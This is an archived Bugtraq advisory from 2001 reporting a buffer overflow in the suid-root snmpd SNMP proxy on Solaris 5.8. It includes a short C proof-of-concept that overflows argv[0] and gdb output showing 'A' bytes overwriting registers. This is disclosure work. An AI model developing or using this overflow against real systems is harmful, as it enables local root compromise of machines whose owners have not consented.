Bugtraq mailing list archives
Solaris 5.8 snmpd Vulnerability
From: Pablo Sor <psor () AFIP GOV AR>
Date: Tue, 13 Mar 2001 07:34:40 -0400
Description The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root and contains a buffer overflow, the problem occurs when it copy his own name (argv[0]) to an internal variable without checking out its lenght and this causes the overflow. Vulnerable Version Sun Solaris 5.8 Technical Description ----------------------------------------------------- #include <stdio.h> void main(int argc,char **argv) { char *buf; buf = (char *) malloc(atoi(argv[1])*sizeof(char)); memset(buf,0x41,atoi(argv[1])-1); buf[atoi(argv[1])-1]=0; execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0); } ----------------------------------------------------- $ uname -a SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10 $ ./snmpd-demo 700 Segmentation Fault (core dumped) $ gdb ./snmpd-demo --core=core [..] Program received signal SIGSEGV, Segmentation fault. 0xfee32b58 in strcpy () from /usr/lib/libc.so.1 (gdb) info registers g0 0x0 0 g1 0x78000 491520 g2 0xff22579c -14526564 g3 0xff162d78 -15323784 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x76f98 487320 o0 0x2c1 705 o1 0xffbed9b9 -4269639 o2 0x2c1 705 o3 0x41 65 o4 0xffbed180 -4271744 o5 0xff26a147 -14245561 sp 0xffbed658 -4270504 o7 0xfee83650 -18336176 l0 0x7efefeff 2130640639 l1 0x81010100 -2130640640 l2 0xff000000 -16777216 l3 0xff0000 16711680 l4 0xff00 65280 l5 0x0 0 l6 0x0 0 l7 0x0 0 i0 0x41414141 1094795585 ;;;;; i1 0xffbed6fc -4270340 ; pointer to argv[0] i2 0x41414141 1094795585 ;;;;; i3 0x41414141 1094795585 ;;;;; i4 0x81010100 -2130640640 i5 0xff00 65280 fp 0xffbed698 -4270440 i7 0xff265474 -14265228 y 0x6 6 psr 0xfe001000 -33550336 wim 0x0 0 tbr 0x0 0 pc 0xfee32b58 -18666664 npc 0xfee32b5c -18666660 fpsr 0x0 0 cpsr 0x0 0 (gdb) x/20x $i1 0xffbed6fc: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbed70c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbed71c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbed72c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbed73c: 0x41414141 0x41414141 0x41414141 0x41414141 Pablo Sor psor () afip gov ar
Current thread:
- Solaris 5.8 snmpd Vulnerability Pablo Sor (Mar 13)
- Re: Solaris 5.8 snmpd Vulnerability Rob Bartlett - HES CTE (Mar 15)
- <Possible follow-ups>
- Re: Solaris 5.8 snmpd Vulnerability Darren Moffat (Mar 14)